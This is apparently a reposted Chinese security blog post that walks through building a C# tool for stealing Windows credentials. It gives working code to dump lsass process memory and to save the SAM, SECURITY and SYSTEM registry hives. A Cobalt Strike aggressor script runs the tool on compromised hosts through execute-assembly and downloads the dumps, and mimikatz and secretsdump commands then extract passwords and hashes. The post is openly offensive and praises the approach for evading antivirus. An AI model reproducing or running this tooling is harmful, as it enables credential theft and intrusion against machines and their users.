前言
选择 C# 的好处是体积小,结合 loadAssembly 方便免杀。造个轮子,希望各位看客有所帮助。
检测权限
因为dump系统lsass内存和sam注册表需要管理员权限,所以首先需要对当前进程上下文权限做判断。
public static bool IsHighIntegrity()
{
// returns true if the current process is running with adminstrative
privs in a high integrity context
var identity = WindowsIdentity.GetCurrent();
var principal = new WindowsPrincipal(identity);
return principal.IsInRole(WindowsBuiltInRole.Administrator);
}
lsass内存
MiniDumpWriteDump是MS DbgHelp.dll 中一个API, 用于导出当前运行的程序的Dump,利用MiniDumpWriteDump实现dump lsass内存的功能,先加载MiniDumpWriteDump函数。
[DllImport("dbghelp.dll", EntryPoint = "MiniDumpWriteDump",
CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode,
ExactSpelling = true, SetLastError = true)]
public static extern bool MiniDumpWriteDump(IntPtr hProcess, uint
processId, SafeHandle hFile, uint dumpType, IntPtr expParam, IntPtr
userStreamParam, IntPtr callbackParam);
之后调用函数,并保存dump文件,代码如下所示:
namespace sharpdump
{
public class MiniDumper
{
public static string MiniDump()
{
Process[] pLsass = Process.GetProcessesByName("lsass");
string dumpFile = Path.Combine(Path.GetTempPath(),
string.Format("lsass{0}.dmp", pLsass[0].Id));
if (File.Exists(dumpFile)) File.Delete(dumpFile);
Console.WriteLine(String.Format("[*] Dumping lsass({0}) to {1}",
pLsass[0].Id, dumpFile));
using (FileStream fs = new FileStream(dumpFile, FileMode.Create,
FileAccess.ReadWrite, FileShare.Write))
{
bool bRet = MiniDumpWriteDump(pLsass[0].Handle, (uint)pLsass[0].Id,
fs.SafeFileHandle, (uint)2, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);
if (bRet)
{
Console.WriteLine("[+] Dump successful!");
return dumpFile;
}
else
{
Console.WriteLine(String.Format("[X] Dump Failed! ErrorCode:
{0}", Marshal.GetLastWin32Error()));
return null;
}
}
}
}
}
实现reg save保存sam注册表
首先导入需要用到的API。
[DllImport("advapi32.dll", CharSet = CharSet.Auto)]
public static extern int RegOpenKeyEx(
UIntPtr hKey,
string subKey,
int ulOptions,
int samDesired,
out UIntPtr hkResult
);
[DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern int RegSaveKey(
UIntPtr hKey,
string lpFile,
IntPtr lpSecurityAttributes
);
[DllImport("advapi32.dll", SetLastError = true)]
public static extern int RegCloseKey(
UIntPtr hKey
);
然后构建函数,对”SAM”, “SECURITY”, “SYSTEM”注册表进行reg save。
namespace sharpdump
{
internal class Reg
{
public static UIntPtr HKEY_LOCAL_MACHINE = new UIntPtr(0x80000002u);
public static int KEY_READ = 0x20019;
public static int KEY_ALL_ACCESS = 0xF003F;
public static int REG_OPTION_OPEN_LINK = 0x0008;
public static int REG_OPTION_BACKUP_RESTORE = 0x0004;
public static int KEY_QUERY_VALUE = 0x1;
public static void ExportRegKey(string key, string outFile)
{
var hKey = UIntPtr.Zero;
try
{
RegOpenKeyEx(HKEY_LOCAL_MACHINE, key, REG_OPTION_BACKUP_RESTORE |
REG_OPTION_OPEN_LINK, KEY_ALL_ACCESS, out hKey);
//https://docs.microsoft.com/en-us/windows/win32/api/winreg/nf-winreg-regcreatekeyexa
RegSaveKey(hKey, outFile, IntPtr.Zero);
RegCloseKey(hKey);
Console.WriteLine("Exported HKLM\\{0} at {1}", key, outFile);
}
catch (Exception e)
{
throw e;
}
}
public static string DumpReg(string key)
{
try
{
String addr = key + ".hiv";
addr = Path.Combine(Path.GetTempPath(), addr);
ExportRegKey(key, addr);
return addr;
}
catch (Exception e)
{
Console.WriteLine(e.Message);
Console.WriteLine(e.StackTrace);
return "";
}
}
}
}
文件会被dump到temp目录下,然后对所有dump成功的文件进行打包处理,方便下载。完整代码稍后上传至知识星球。
关于ExecuteAssembly
ExecuteAssembly是CS可执行组件的一个替代方案,ExecuteAssembly基于C/C++构建,可以帮助广大研究人员实现.NET程序集的加载和注入。ExecuteAssembly复用了主机进程spawnto来加载CLR模块/AppDomainManager,Stomping加载器/.NET程序集PE DOS头,并卸载了.NET相关模块,以实现ETW+AMSI绕过。除此之外,它还能够绕过基于NT静态系统调用的EDR钩子,以及通过动态解析API(superfasthash哈希算法)实现隐藏导入。当前metasploit-framework和Cobalt Strike都已经实现了ExecuteAssembly功能,下面主要以Cobalt Strike为例,实现dump系统lsass内存和sam注册表的功能
CS 插件
以结合 Cobalt Strike 为例,编写一个简单的cna脚本。
popup beacon_bottom {
menu "Dumper" {
item "SharpDump"{
local('$bid');
foreach $bid ($1){
bexecute_assembly($1, script_resource("Dumper.exe"));
}
}
item "DownloadDump"{
prompt_text("File's address to download", "", lambda({
bdownload(@ids, $1);
}, @ids => $1));
}
}
}
加载脚本后,执行SharpDump,结果如下所示:
下载存放在temp目录下的dump.gz,然后使用Decompress解压,最后使用mimikatz 解密用户lsass.dmp和sam文件
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
lsadump::sam /sam:sam.hiv /system:system.hiv
或者使用 Impacket 的 secretsdump 脚本
https://github.com/SecureAuthCorp/impacket
python secretsdump.py -sam SAM.hiv -security SEC -system systemless.txt LOCAL
参考文章和项目
https://www.cobaltstrike.com/aggressor-script/functions.html
https://github.com/EncodeGroup/RegSave
https://shanfenglan.blog.csdn.net/article/details/108149449
来源:freebuf.com 2021-06-22 15:50:01 by: 宽字节安全实验室
请登录后发表评论
注册